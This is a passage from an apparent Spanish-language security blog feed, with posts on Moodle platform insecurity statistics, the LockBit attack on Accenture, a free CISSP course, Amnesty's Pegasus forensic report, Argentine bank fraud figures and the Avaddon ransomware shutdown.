Además de ser un grupo puente para programas menos maduros, los Purple Teams
también puede ayudar a las organizaciones a aclimatar su gestión al concepto
de emulación de atacantes, que puede ser un concepto aterrador para muchas
organizaciones.
</p>
<h3>Notas</h3>
<p>
Todos estos términos pueden aplicarse a cualquier tipo de operación de
seguridad, pero estas definiciones específicas están sintonizadas con la
seguridad de la información.
</p>
<p>
Fuente: <a
href="https://danielmiessler.com/study/red-blue-purple-teams/"
rel="nofollow"
target="_blank"
>Daniel Miessler</a
>
</p>
SeguInfohttp://www.blogger.com/profile/11759277836606336524noreply@blogger.com0tag:blogger.com,1999:blog-14423462.post-13045443045732355372021-08-31T09:00:00.004-03:002021-08-31T09:00:00.405-03:00Moodlelandia: (inseguridad) en plataformas Moodle [Informe]<center>
<a href="https://descargas.segu-info.com.ar/?id=489" target="_blank"><img height="210" src="https://i.imgur.com/x7wVdjV.png" width="640" /></a>
</center>
<h3>Introducción</h3>
<p>
Durante los últimos años y principalmente durante la pandemia, el uso de las
plataformas de educación y cursos virtuales se ha incrementado
exponencialmente. Escuelas, colegios, universidades y empresas se volcaron por
igual a cambiar sus sistemas educativos y programas de capacitación por otros,
basados en las tecnologías de la información y la comunicación en línea y a
distancia.
</p>
<p>
La mayoría de las veces, estas aplicaciones denominadas Sistemas de
Administración de Aprendizaje (<i>Learning Management System - LMS,</i> por su
nombre en inglés), son servicios web que, por el tipo de datos que tratan, la
seguridad debería ser esencial.
</p>
<p>
<a href="https://moodle.org/" rel="nofollow" target="_blank">MOODLE</a> es un
software LMS gratuito y de distribución libre, desarrollado en el lenguaje de
programación PHP y compatible con cualquier sistema operativo y servidor web.
La primera versión fue desarrollada por el pedagogo e informático australiano
<i>Martin Dougiamas</i>, publicada en 2002 bajo Licencia GNU/GPL y actualmente
es mantenida por la comunidad. Fue concebido para ayudar a los docentes a
crear comunidades de aprendizaje en línea y educación a distancia.
</p>
<p>
En agosto de 2021, la versión más reciente es la v3.11.2+ y la última
<i style="mso-bidi-font-style: normal;">Long-Term Support (LTS)</i> es la
v3.9. La versión estable 4.x está planificada para diciembre de 2021 Así
mismo, Moodle informa oficialmente que existen al menos 186.184 sitios en 246
países, de los cuales 138.428 no son listados porque han solicitado mantenerse
en privado. Es interesante remarcar que Moodle mantiene este listado para que
los responsables de los sitios web registren sus instalaciones de forma
voluntaria y, de esta forma, poder mantenerlos informados sobre cambios,
actualizaciones y mejoras en la plataforma.
</p>
<div>
<b>En los países considerados para el presente informe (20 países en América
Latina + España), se registran 68.276 sitios que utilizan Moodle pero solo
11.973 han podido ser indexados apropiadamente para realizar el análisis.</b>
</div>
<h3>Principales hallazgos</h3>
<p>
Luego de analizar casi doce mil sitios, los principales resultados respecto a
seguridad de las plataformas Moodle en las organizaciones se pueden resumir en
los siguientes aspectos:
</p>
<ol>
<li>
Casi la mitad de las instalaciones de Moodle utilizan versiones ya no
soportadas por el desarrollador.
</li>
<li>
No se encontró ninguna instalación con la última versión y completamente
actualizada a la fecha.
</li>
<li>
Sólo un tercio de los sitios utilizan comunicaciones cifradas (HTTPS).
</li>
<li>
En más de la mitad de los casos, fue posible encontrar archivos de
configuración sin protección y no se observó ningún proceso de
<i>hardening</i>; sólo un quince por ciento ha decidido proteger de alguna
manera la versión de la plataforma de instalación (sistema operativo,
servidor web o versión de Moodle).
</li>
<li>
Una décima parte de los sitios se encuentran instalados sobre un servidor
web actualizado. Apenas un porcentaje mayor, mantiene una versión
actualizada del lenguaje de programación PHP.
</li>
<li>
Aproximadamente un tercio de los sitios analizados contienen al menos una
vulnerabilidad pública, conocida y documentada (con CVE asignado).
</li>
<li>
Fue posible identificar más de cincuenta vulnerabilidades distintas en todos
los sitios analizados y con un promedio de cinco vulnerabilidades por sitio.
</li>
</ol>
<center>
<a href="https://descargas.segu-info.com.ar/?id=489" style="background-color: #ff9d00; border-radius: 28px; border: 1px solid rgb(255, 157, 0); color: white; cursor: pointer; display: inline-block; font-family: Monda, Helvetica, Arial, Sans-serif; font-size: 18px; padding: 16px 60px; text-decoration: none; text-shadow: rgb(47, 102, 39) 0px 1px 0px;" target="_blank">
Descargar Moodlelandia: (in)seguridad en plataformas Moodle
</a>
</center>
<p align="right">
<span style="font-size: medium;">
Lic. Cristian Borghello (<a href="https://twitter.com/seguinfo">@seguinfo</a>) – Director de <a href="https://www.segu-info.com.ar/"> Segu-Info</a>
<br />
Ing. Daniel Maldonado (<a href="https://twitter.com/elcodigok">@elcodigok</a>) – Autor del libro "Máxima seguridad en Wordpress"
</span>
</p>
SeguInfohttp://www.blogger.com/profile/11759277836606336524noreply@blogger.com0tag:blogger.com,1999:blog-14423462.post-37923458064283631702021-08-11T16:39:00.002-03:002021-08-11T16:48:37.553-03:00Accenture afectado por el ransomware LockBit<p>
Accenture, el gigante global de consultoría de TI, supuestamente ha sido
atacado por un ciberataque de ransomware de la banda de ransomware LockBit. Con un valor de 44.300 millones de dólares, Accenture es una de las firmas de
consultoría tecnológica más grandes del mundo y emplea a unos 569.000
empleados en 50 países.</p>
<p>
El grupo de ransomware conocido como LockBit 2.0 amenaza con publicar datos de
archivos presuntamente robados de Accenture durante un ciberataque reciente.
Los actores de amenazas afirman que publicarán los datos si no
se paga el rescate solicitado.
</p><div class="separator" style="clear: both; text-align: center;"><a href="https://i.imgur.com/UItxDVB.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="510" data-original-width="639" height="511" src="https://i.imgur.com/UItxDVB.png" width="640" /></a></div><br /><p>Si bien LockBit no ha mostrado pruebas de los datos robados, <a href="https://twitter.com/vxunderground/status/1425462666408210433" rel="nofollow" target="_blank">afirman estar dispuestos a venderlos a cualquier parte interesada</a>. <i>"Estas personas están más allá de la privacidad y la seguridad. Realmente
espero que sus servicios sean mejores de lo que vi como información
privilegiada. Si está interesado en comprar algunas bases de datos,
comuníquese con nosotros"</i>, afirma LockBit en su sitio de filtración de datos.</p>
<p>Aún no se conocen los detalles exactos sobre cuándo ocurrió la infracción,
cuándo se detectó, su alcance o la causa técnica de la explotación. <a href="https://www.bleepingcomputer.com/news/security/accenture-confirms-hack-after-lockbit-ransomware-data-leak-threats/" rel="nofollow" target="_blank">Accenture le dijo a BleepingComputer</a> que los sistemas afectados se habían
recuperado de una copia de seguridad: <i>"Restauramos completamente nuestros sistemas afectados desde la copia de
seguridad. No hubo ningún impacto en las operaciones de Accenture ni en los
sistemas de nuestros clientes"</i></p>
<p>En conversaciones vistas por el <a href="https://twitter.com/AuCyble/status/1425422006690881541" rel="nofollow" target="_blank">equipo de investigación de Cyble</a>, la banda de
ransomware LockBit <b>afirma haber robado seis terabytes de datos de Accenture y
exige un rescate de 50 millones de dólares. </b></p><p>uentes familiarizadas con el ataque han dicho que
Accenture había confirmado el ataque de ransomware al menos a un proveedor de
CTI, y que el proveedor de servicios de TI también está en proceso de
notificar a más clientes. Además, la firma de inteligencia sobre delitos cibernéticos <a href="https://twitter.com/HRock/status/1425447533598453760?" rel="nofollow" target="_blank">Hudson Rock compartió</a> que Accenture tenía 2.500 computadoras comprometidas pertenecientes
a empleados y socios:</p>
<p>A principios de esta semana, el gobierno australiano había advertido sobre la
<a href="https://www.bleepingcomputer.com/news/security/australian-govt-warns-of-escalating-lockbit-ransomware-attacks/" rel="nofollow" target="_blank">escalada de ataques de ransomware LockBit 2.0</a>, después de que <a href="https://www.bleepingcomputer.com/news/security/lockbit-ransomware-recruiting-insiders-to-breach-corporate-networks/" rel="nofollow" target="_blank">se vio al grupo reclutando activamente a personas con información privilegiada</a> en las empresas
que planean violar, a cambio de millones de dólares en recompensas.</p><p>En junio, el equipo de <a href="https://www.zdnet.com/article/a-deep-dive-into-the-operations-of-the-lockbit-ransomware-group/" rel="nofollow" target="_blank">Prodaft Threat Intelligence publicó un informe</a> en el que examinaba la estructura RaaS de LockBit y la propensión de sus afiliadas a comprar el acceso del protocolo RDP como vector de ataque inicial.</p><p>Fuente: <a href="https://www.bleepingcomputer.com/news/security/accenture-confirms-hack-after-lockbit-ransomware-data-leak-threats/" rel="nofollow" target="_blank">BC</a></p>
<p>
</p>
SeguInfohttp://www.blogger.com/profile/11759277836606336524noreply@blogger.com0tag:blogger.com,1999:blog-14423462.post-59779971290041881882021-08-01T09:30:00.010-03:002021-10-05T12:15:05.234-03:00Curso Bootcamp #CISSP gratis<p></p>
<div class="separator" style="clear: both; text-align: center;">
<a
href="https://www.youtube.com/seguinfo"
style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"
><img
border="0"
data-original-height="211"
data-original-width="484"
height="174"
src="https://i.imgur.com/ivOLj71.png"
width="400"
/></a>
</div>
Ha pasado mucho tiempo desde la obtención de
<a
href="https://blog.segu-info.com.ar/2008/02/el-placer-de-ser-cissp.html"
target="_blank"
>mi certificación CISSP</a
>. Corría 2007 y nueve meses de estudio junto a otros profesionales invaluables,
fueron literalmente, un parto. Obtener CISSP no es fácil, tampoco imposible.
<b
>En esos sábado y noches de estudio aprendí muchas cosas, pero una es las más
importante: el apoyo de los otros no tiene precio.</b
>
<p></p>
<p>
Diez años después (finales de 2017), junto a, primero un profesor, luego un
colega, luego un amigo, Ezequiel Sallis (aka
<a href="https://twitter.com/simubucks" rel="nofollow" target="_blank"
>@simubucks</a
>), decidimos dar un pasito más y comenzar a dictar el Bootcamp CISSP de forma
remota. Ya teníamos la experiencia de brindarlo de forma presencial en varios
países, pero esto ponía la vara aún más alta:
</p>
<p></p>
<ul style="text-align: left;">
<li>
¿Cómo se interactúa con estudiantes de todo el mundo sin verles la cara?
</li>
<li>
¿Cómo saber si un concepto fue explicado de forma correcta o si el
participante lo entendió?
</li>
<li>¿Cómo hacer una broma sin conocer la sonrisa cómplice del otro lado?</li>
<li>
¿Cómo explicar esas preguntas de la certificación que no son blanco ni
negro? Son grises, muy finos y es en dónde radica la diferencia entre el 70%
(<i>"FELICITACIONES"</i>) o el 69,9% (<i>"Inténtalo de nuevo"</i>).
</li>
</ul>
<p>
La plataforma y campus virtual
<a
href="http://seu.sanfrancisco.utn.edu.ar/contenidos/que-es-aula-25-40"
rel="nofollow"
target="_blank"
>AULA25</a
>
de la Universidad Tecnológica Nacional de Argentina (UTN) era quien nos
desafiaba a publicar nuestro curso de Bootcamp CISSP, 40 horas de curso de
video online. ¡Vaya para ellos nuestro más profundo agradecimiento por
confiar!
</p>
<p>
Y sí, dijimos que sí. Y fueron tres años de innumerables asistentes y alumnos
de habla hispana que también confiaron y compraron el curso. Algunos se
animaron al curso en video, otros se animaron al examen final del curso y,
otros ¡se animaron a rendir la certificación y aprobaron!. Y ahí estábamos
nosotros, siendo un pedacito de su historia personal y profesional.
</p>
<p>
Porque eso era lo que yo había aprendido en 2007, el apoyo de otros que ya
hicieron el camino o de quienes lo hacen contigo no tiene precio. Mi
certificación CISSP fue eso, el tener gente que, sin pedir nada a cambio te
brindada su conocimiento para enriquecer mi profesión.
</p>
<h3 style="text-align: center;">
<b
>Eso es lo que ponemos a disposición hoy: el
<a
href="https://www.youtube.com/Seguinfo?sub_confirmation=1"
rel="nofollow"
target="_blank"
>Curso Bootcamp CISSP</a
>
completamente gratuito para todos, en español y en línea.</b
>
</h3>
<p>
Para asistir no tienes que hacer nada, simplemente ingresar a
<a
href="https://www.youtube.com/Seguinfo?sub_confirmation=1"
rel="nofollow"
target="_blank"
>Youtube</a
>
o
<a href="https://vimeo.com/seguinfo" rel="nofollow" target="_blank">Vimeo</a>
y suscribirte, cada semana publicaremos un módulo, sí gratis. Antes de iniciar
te recomiendo veas
<a
href="https://www.youtube.com/watch?v=8Athq6vY91A&t=2s"
rel="nofollow"
target="_blank"
>este video</a
>, donde explico todo.
</p>
<p>
<b
>Que lo disfrutes, y luego de finalizar el curso te animamos a rendir la
certificación de
<a
href="https://www.isc2.org/Certifications/CISSP"
rel="nofollow"
target="_blank"
>(ISC)2 CISSP</a
>. VALE EL ESFUERZO.</b
>
</p>
<h3 style="text-align: left;"><b>Contenido</b></h3>
<p></p>
<ul style="text-align: left;">
<li><span style="font-size: medium;">Introducción</span></li>
<ul>
<li>
<span style="font-size: medium;"
><a href="https://www.youtube.com/watch?v=8Athq6vY91A" target="_blank"
>0.0 - Introducción al curso gratuito</a
></span
>
</li>
<li>
<span style="font-size: medium;"
><a href="https://www.youtube.com/watch?v=ei-8_xCPvso" target="_blank"
>0.1 - Preguntas de ejemplo</a
></span
>
</li>
<li>
<span style="font-size: medium;"
><a href="https://www.youtube.com/watch?v=VEBhktuDhpc" target="_blank"
>0.2 - Introducción a la Certificación CISSP</a
></span
>
</li>
</ul>
<li><span style="font-size: medium;">Dominio 1</span></li>
<ul>
<li>
<span style="font-size: medium;"
><a href="https://www.youtube.com/watch?v=r-Xr58jVFTs" target="_blank"
>01.1 - Security and Risk Management</a
></span
>
</li>
<li>
<span style="font-size: medium;"
><a
href="https://www.youtube.com/watch?v=ErC4-G9EYEg"
rel="nofollow"
target="_blank"
>01.2 - Risk Management</a
></span
>
</li>
<li>
<a
href="https://www.youtube.com/watch?v=x2ewqB9dlbw"
rel="nofollow"
target="_blank"
><span style="font-size: medium;"
>01.3 - Legal, Regulations y Compliance</span
></a
>
</li>
</ul>
<li><span style="font-size: medium;">Dominio 2</span></li>
<ul>
<li>
<a
href="https://www.youtube.com/watch?v=Fli_WB2pYWw"
rel="nofollow"
target="_blank"
><span style="font-size: medium;">02.1 - Asset Security</span></a
>
</li>
<li>
<a
href="https://www.youtube.com/watch?v=gsXtC5QL4Tg"
rel="nofollow"
target="_blank"
><span style="font-size: medium;"
>02.2 - CISSP Dominio 2 - Controles Administrativos</span
></a
>
</li>
</ul>
<li><span style="font-size: medium;">Dominio 3</span></li>
<ul>
<li>
<a
href="https://www.youtube.com/watch?v=rb24fqvONJY"
rel="nofollow"
target="_blank"
><span style="font-size: medium;"
>03.1 - CISSP Dominio 3 - Principios de Security Engineering</span
></a
>
</li>
<li>
<a
href="https://www.youtube.com/watch?v=V5ROHBtkBRs"
rel="nofollow"
target="_blank"
><span style="font-size: medium;"
>03.2 - CISSP Dominio 3 - Cloud Computing y conceptos de
Criptografía</span
></a
>
</li>
<li>
<a
href="https://www.youtube.com/watch?v=sxuhvqJ5fOY"
rel="nofollow"
target="_blank"
><span style="font-size: medium;"
>03.3 - CISSP Dominio 3 - Criptografía Simétrica</span
></a
>
</li>
<li>
<a
href="https://www.youtube.com/watch?v=v4dfvtGZMik"
rel="nofollow"
target="_blank"
><span style="font-size: medium;"
>03.4 - CISSP Dominio 3 - Criptografía Asimétrica</span
></a
>
</li>
</ul>
<li><span style="font-size: medium;">Dominio 4</span></li>
<ul>
<li>
<a
href="https://www.youtube.com/watch?v=pBLO5FhZYV8"
rel="nofollow"
target="_blank"
><span style="font-size: medium;"
>04.1 - CISSP Dominio 4 - Communications and Network Security</span
></a
>
</li>
</ul>
</ul>
<p><br /></p>
<div style="text-align: right;">
<i>Lic. Cristian Borghello</i> (<a
href="https://twitter.com/seguinfo"
rel="nofollow"
style="text-align: left;"
target="_blank"
>@seguinfo</a
>)<i>, CISSP - CCSK - CSFPC</i>
</div>
<i
><div style="text-align: right;">
<i>Director Segu-Info - Segu-Kids - Antiphishing - ODILA</i>
</div></i
>
<p></p>
SeguInfohttp://www.blogger.com/profile/11759277836606336524noreply@blogger.com18tag:blogger.com,1999:blog-14423462.post-86292488758102616772021-07-19T08:59:00.009-03:002021-08-02T18:38:41.389-03:00 Informe forense de Pegasus de NSO Group por Amnistía Internacional<div class="separator">
<div class="separator" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;">
<img border="0" data-original-height="340" data-original-width="800" height="136" src="https://neu-cdn-amnesty-org-prd.azureedge.net/cache/d/6/0/c/2/3/d60c23663922740b74cbf71bdc00e042b44e7cff.jpg" width="320" />
</div>
</div>
<p>
NSO Group afirma que su software espía Pegasus solo se utiliza para
<i>"<a href="https://www.nsogroup.com/" rel="nofollow" target="_blank">investigar el terrorismo y el crimen</a>
y
<a href="https://www.documentcloud.org/documents/4599753-NSO-Pegasus.html" rel="nofollow" target="_blank">no deja rastro alguno</a>"</i>.
</p>
<p>
El informe
<a href="https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/" rel="nofollow" target="_blank">"Forensic Methodology Report: How to catch NSO Group’s Pegasus"</a> de Amnistía Internacional es una investigación colaborativa que
involucra a más de 80 periodistas de 17 organizaciones de medios en 10 países
coordinados por Forbidden Stories con el apoyo técnico del
<a href="https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/#_ftnref1" rel="nofollow" target="_blank">Laboratorio de Seguridad de Amnistía Internacional</a><span face="sans-serif" style="font-size: 14px;">.</span>
</p>
<p>
El Laboratorio de Seguridad de Amnistía Internacional ha realizado análisis
forenses en profundidad de numerosos dispositivos móviles de Defensores de los
Derechos Humanos <i>(Human Rights Defenders - HRDs)</i> y periodistas de todo
el mundo. Esta investigación ha descubierto una vigilancia ilegal
generalizada, persistente y continua y abusos de los derechos humanos
perpetrados con el software espía Pegasus de NSO Group.
</p>
<p>
Como se establece en los Principios Rectores de las Naciones Unidas sobre
Empresas y Derechos Humanos, NSO Group debe tomar medidas proactivas
urgentemente para garantizar que no cause ni contribuya a abusos de derechos
humanos dentro de sus operaciones globales, y para responder a cualquier abuso
de derechos humanos cuando ocurren. Para cumplir con esa responsabilidad, NSO
Group debe llevar a cabo la debida diligencia en materia de derechos humanos y
tomar las medidas necesarias para garantizar que los defensores de derechos
humanos y los periodistas no sigan siendo objeto de vigilancia ilegal.
</p>
<p>
Este informe documenta los rastros forenses que se dejaron en los dispositivos
iOS y Android después de la orientación con el software espía Pegasus. Esto
incluye registros forenses que relacionan las infecciones recientes de Pegasus
con el Pegasus de 2016, utilizado para atacar al activista
<a href="https://en.wikipedia.org/wiki/Ahmed_Mansoor" rel="nofollow" target="_blank">Ahmed Mansoor</a>.
</p>
<p>
En este informe sobre metodología forense, Amnistía Internacional comparte su
metodología y publica una herramienta forense móvil de código abierto e
indicadores técnicos detallados, con el fin de ayudar a los investigadores de
seguridad de la información y a la sociedad civil a detectar y responder a
estas graves amenazas.
</p>
<p>
Está herramienta, llamada
<a href="https://github.com/mvt-project/mvt" rel="nofollow" target="_blank">Mobile Verification Toolkit (MVT)</a>
es modular y simplifica el proceso de adquisición y análisis de datos de
dispositivos Android y el análisis de registros de copias de seguridad de iOS
y volcados del sistema de archivos, específicamente para identificar posibles
rastros de compromiso. MVT leer indicadores de compromiso en
<a href="https://oasis-open.github.io/cti-documentation/stix/intro.html" rel="nofollow" target="_blank">formato STIX2</a>
e identificar cualquier indicador coincidente que se encuentre en el
dispositivo. Junto con los indicadores de Pegasus, MVT puede ayudar a
identificar si un iPhone se ha visto comprometido.
</p>
<p></p>
<ul style="text-align: left;">
<li>Descifrar las copias de seguridad de iOS cifradas.</li>
<li>
Procesar y analizar numerosos registros del sistema y bases de datos de
aplicaciones y sistemas iOS.
</li>
<li>Extraer las aplicaciones instaladas de los dispositivos Android.</li>
<li>
Extraier información de diagnóstico de dispositivos Android a través del
protocolo ADB.
</li>
<li>
Comparar los registros extraídos con una lista proporcionada de indicadores
maliciosos en formato STIX2.
</li>
<li>
Identificar automáticamente mensajes SMS maliciosos, sitios web visitados,
procesos maliciosos y mucho más.
</li>
<li>
Generar registros JSON de registros extraídos de todos los rastros
maliciosos detectados.
</li>
<li>
Generar una línea de tiempo cronológica unificada de registros extraídos,
junto con una línea de tiempo de todos los rastros maliciosos detectados.
</li>
</ul>
<p></p>
<p>
Los ataques de Pegasus detallados en este informe y los apéndices que lo
acompañan son desde 2014 hasta julio de 2021. Estos también incluyen los
llamados ataques de <i>"zero-click"</i> que no requieren ninguna interacción
del objetivo. Los ataques de cero-clic se han observado desde mayo de 2018 y
continúan hasta ahora. Más recientemente, se han observado ataque exitosos que
explotan varios días <i>zero-click</i> para atacar un iPhone 12 completamente
parcheado con iOS 14.6 en julio de 2021.
</p>
<p>
Las secciones 1 a 8 de este informe describen los rastros forenses que quedan
en los dispositivos móviles después de una infección por Pegasus. Esta
evidencia se ha recopilado de los teléfonos de defensores y defensoras de los
derechos humanos y periodistas en varios países.
</p>
<p>
Finalmente, en la sección 9 del informe se documenta la evolución de la
infraestructura de red de Pegasus desde 2016. NSO Group ha rediseñado su
infraestructura de ataque empleando múltiples capas de dominios y servidores.
Los repetidos errores de seguridad operativa han permitido al Laboratorio de
Seguridad de Amnistía Internacional mantener una visibilidad continua de esta
infraestructura y publican un conjunto de 700 dominios relacionados con
Pegasus.
</p>
<p>
Los nombres de varios de los objetivos de la sociedad civil en el informe se
han anonimizado por razones de seguridad. A las personas que han sido
anonimizadas se les ha asignado un nombre de código alfanumérico en este
informe.
</p>
<p style="text-align: center;">
<b>Acceder al informe <a href="https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/" rel="nofollow" target="_blank">"Forensic Methodology Report: How to catch NSO Group’s Pegasus"</a></b></p>
SeguInfohttp://www.blogger.com/profile/11759277836606336524noreply@blogger.com0tag:blogger.com,1999:blog-14423462.post-68703484884263430852021-06-22T09:00:00.038-03:002021-06-22T09:00:00.566-03:00Estudio de montos y entidades afectadas por #fraudes en Argentina #CortemosConElFraude<p>
La situación de pandemia ha generado un incremento notable de los casos de
estafas virtuales, en particular, relacionadas al mundo bancario. Sin embargo,
la falta de transparencia de las entidades bancarias, sumado al alto índice de
la
<a href="https://www.odila.org/pdf/cifra_negra_delitos_informaticos.pdf" rel="nofollow" target="_blank">cifra negra</a>
de este tipo de delitos, dificulta avanzar sobre un dimensionamiento más
preciso sobre la gravedad de esta problemática.
</p>
<p>
En este sentido, y agradeciendo a la cooperación e información de
<a href="https://ucu.org.ar/" rel="nofollow" target="_blank">Usuarios y Consumidores Unidos (UCU)</a>, hemos procesado y anonimizado sus estadísticas para generar nuevos índices
que permiten un mejor acercamiento para comprender la complejidad de la
problemática.
</p><div class="separator" style="clear: both; text-align: center;">
<a href="https://www.odila.org/analisis-fraude" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="300" src="https://i.imgur.com/OXVtHdI.png" width="300" /></a>
</div>
<p><b>
Entre los datos más sobresalientes del
<a href="https://www.odila.org/analisis-fraude" rel="nofollow" target="_blank">estudio</a>
realizado, podemos destacar:<br />
</b></p>
<ul style="background: rgba(242, 242, 242, 0.8); border-radius: 5px; text-shadow: rgb(254, 254, 254) 1px 1px 1px;">
<li>
Buenos Aires, CABA y Santa Fe son las 3 jurisdicciones con mayor cantidad de
estafas.
</li>
<li>
Las entidades bancarias con mayor número de estafas son Banco Galicia, BBVA
Frances y Santander Rio.
</li>
<li>
El
<span style="box-sizing: border-box; font-size: 20px; font-weight: 700;">47%</span>
de las víctimas, tenían un crédito preasignado.
</li>
<li>
El
<span style="box-sizing: border-box; font-size: 20px; font-weight: 700;">76%</span>
de las víctimas, hizo sus reclamos ante la entidad bancaria, pero el
<span style="box-sizing: border-box; font-size: 20px; font-weight: 700;">97%</span>
no tuvo ningún tipo de respuesta o solución de su parte.
</li>
<li>
El
<span style="box-sizing: border-box; font-size: 20px; font-weight: 700;">52%</span>
de los afectados no realizó ningún tipo de denuncia penal (cifra negra).
</li>
<li>
El promedio de fraude por víctima:
<span style="box-sizing: border-box; font-size: 20px; font-weight: 700;">$ 308.991</span>
</li>
<li>
Total anualizado de fraude:
<span style="box-sizing: border-box; font-size: 20px; font-weight: 700;">$ 643.182.021 (643 millones de pesos)</span>
</li>
</ul>
<div style="text-align: center;">
<span style="box-sizing: border-box; font-size: 20px; font-weight: 700;"><a href="https://www.odila.org/analisis-fraude" rel="nofollow" target="_blank">Ver todos los resultados del estudio en ODILA</a></span>
</div>
<p>
Desde
<a href="https://www.odila.org/" rel="nofollow" target="_blank">ODILA</a>
seguimos invitando a la difusión de nuestra campaña
<a href="https://www.odila.org/cortemosconelfraude" rel="nofollow" target="_blank">#CortemosConElFraude</a>, haciendo especial foco sobre la responsabilidad de las entidades bancarias
en materia de la implementación y control de medidas de seguridad que impida o
al menos, obstaculice la facilidad con la que los delincuentes siguen
estafando a sus clientes.
</p>
SeguInfohttp://www.blogger.com/profile/11759277836606336524noreply@blogger.com4tag:blogger.com,1999:blog-14423462.post-45940814232361876562021-06-11T16:01:00.010-03:002021-06-27T11:35:06.578-03:00Ransomware #Avaddon cierra su operación y publica las claves <div class="separator">
<div class="separator" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em; text-align: center;">
<img border="0" data-original-height="340" data-original-width="680" height="196" src="https://www.bleepstatic.com/images/news/ransomware/a/avaddon/shut-down-decryption-keys/zip-folder.jpg" width="400" />
</div>
</div>
<p>
La banda de <b>ransomware Avaddon</b> ha cerrado la operación y
<a href="https://www.bleepingcomputer.com/news/security/avaddon-ransomware-shuts-down-and-releases-decryption-keys/" rel="nofollow" target="_blank">ha entregado las claves de descifrado de sus víctimas a BleepingComputer</a>. El cierre de Avaddon surgió de la nada y ha sorprendido a la comunidad de
investigadores de seguridad.
</p>
<p>
Después de la desaparición de la banda de ransomware
<a href="https://blog.segu-info.com.ar/search/?q=darkside" target="_blank">Darkside</a>
a raíz del ataque
<a href="https://blog.segu-info.com.ar/search/?q=colonial" target="_blank">Colonial Pipeline</a>, la banda Avaddon se había movido de manera muy agresiva para llenar el
vacío dejado en el mercado,
<a href="https://therecord.media/avaddon-ransomware-operation-shuts-down-and-releases-decryption-keys/" rel="nofollow" target="_blank">dijo a The Record</a>
Allan Liska, un analista de seguridad de Recorded Future que rastrea las
operaciones de ransomware.
</p>
<p>
Esta mañana,
<a href="https://twitter.com/fwosar/status/1403386634108813317" rel="nofollow" target="_blank">BleepingComputer recibió un aviso anónimo</a>
que pretendía ser del FBI y que contenía una contraseña y un enlace a un
archivo ZIP protegido por contraseña. Este archivo decía ser
<i>"Decryption Keys Ransomware Avaddon"</i> y contenía los tres archivos. Después de compartir los archivos con
<a href="https://twitter.com/fwosar" rel="nofollow noopener" target="_blank">
de Emsisoft y </a><a href="https://twitter.com/demonslay335" rel="nofollow noopener" target="_blank">Michael Gillespie</a>
de Coveware, confirmaron que las claves son legítimas.</p>
<p>
En total, los actores de la amenaza enviaron 2.934 claves de descifrado, donde
cada clave corresponde a una víctima específica.
<b><a href="https://www.emsisoft.com/ransomware-decryption-tools/avaddon" rel="nofollow" target="_blank">Emsisoft ya publicó descifrador gratuito</a>
con esas claves.
</b>
</p>
<p>
Si bien no sucede con la suficiente frecuencia, los grupos de ransomware han
publicado previamente claves de descifrado, como un gesto de buena voluntad
cuando cierran o lanzan una nueva versión.
</p>
<p>
En el pasado, se lanzaron claves de descifrado para
<a href="https://www.bleepingcomputer.com/news/security/teslacrypt-shuts-down-and-releases-master-decryption-key/" target="_blank">TeslaCrypt</a>,
<a href="https://www.bleepingcomputer.com/news/security/master-decryption-keys-and-decryptor-for-the-crysis-ransomware-released/" target="_blank">Crysis</a>,
<a href="https://www.bleepingcomputer.com/news/security/aes-ni-ransomware-dev-releases-decryption-keys-amid-fears-of-being-framed-for-xdata-outbreak/" target="_blank">AES-NI</a>,
<a href="https://www.bleepingcomputer.com/news/security/shade-ransomware-shuts-down-releases-750k-decryption-keys/" target="_blank">Shade</a>, <a href="https://www.bleepingcomputer.com/news/security/master-decryption-key-released-for-fileslocker-ransomware/" target="_blank">FilesLocker</a><span style="background-color: white; color: #070707; font-family: Georgia, "times new roman", Times, serif; font-size: 18px;">, </span><a href="https://www.bleepingcomputer.com/news/security/ziggy-ransomware-shuts-down-and-releases-victims-decryption-keys/" target="_blank">Ziggy</a>, y
<a href="https://www.bleepingcomputer.com/news/security/fonix-ransomware-shuts-down-and-releases-master-decryption-key/" target="_blank">FonixLocker</a>.
</p>
<p>
<a href="https://www.bleepingcomputer.com/news/security/new-avaddon-ransomware-launches-in-massive-smiley-spam-campaign/" rel="nofollow" target="_blank">Avaddon lanzó su operación en junio de 2020</a>
a través de una campaña de phishing que sólo contenía un guiño sonriente. Con
el tiempo, Avaddon se ha convertido en una de las operaciones de ransomware
más importantes, y el FBI y la policía australiana
<a href="https://www.bleepingcomputer.com/news/security/us-and-australia-warn-of-escalating-avaddon-ransomware-attacks/" rel="nofollow" target="_blank">publicaron recientemente avisos</a>
relacionados con el grupo.
</p>
<p>
"Avaddon estaba vinculado con Conti en la mayor parte de las extorsiones de
ransomware publicadas desde el ataque Colonial Pipeline. Cincuenta y nueve
víctimas publicadas desde el 7 de mayo, 182 en total desde el lanzamiento en
agosto de 2020.
</p>
<div class="separator" style="clear: both; text-align: center;">
<img border="0" data-original-height="605" data-original-width="800" src="https://therecord.media/wp-content/uploads/2021/06/ransomware_victims.png" />
</div>
<p>
A diferencia de otras bandas de ransomware que cierran sus operaciones a
través de mensajes pomposos publicados en línea, la banda Avaddon parece haber
desaparecido de la faz de la tierra. Los mensajes a una cuenta de su foro,
ahora borrado, no fueron devueltos. También se han eliminado todas las
publicaciones realizadas desde esa cuenta.
</p>
<p>
Una teoría que gana terreno en la comunidad de seguridad sugiere que
<a href="https://therecord.media/avaddon-ransomware-operation-shuts-down-and-releases-decryption-keys/" rel="nofollow" target="_blank">el grupo puede estar entrando en una fase de "cambio de marca"</a>, algo que muchas otras pandillas han hecho antes, como Nemty-to-Nefilim y
Gandcrab-to-REvil. Poco después del ataque Colonial Pipeline, la pandilla
Avaddon también anunció planes para volverse privados y trabajar solo con un
número seleccionado de afiliados para sus intrusiones. Cambiar la marca y
volverse privado sería una buena manera para que la pandilla Avaddon "pierda"
a las agencias de aplicación de la ley y las firmas de seguridad que
actualmente siguen sus movimientos.
</p>
<p>
En este momento, todos los sitios Tor de Avaddon son inaccesibles, lo que
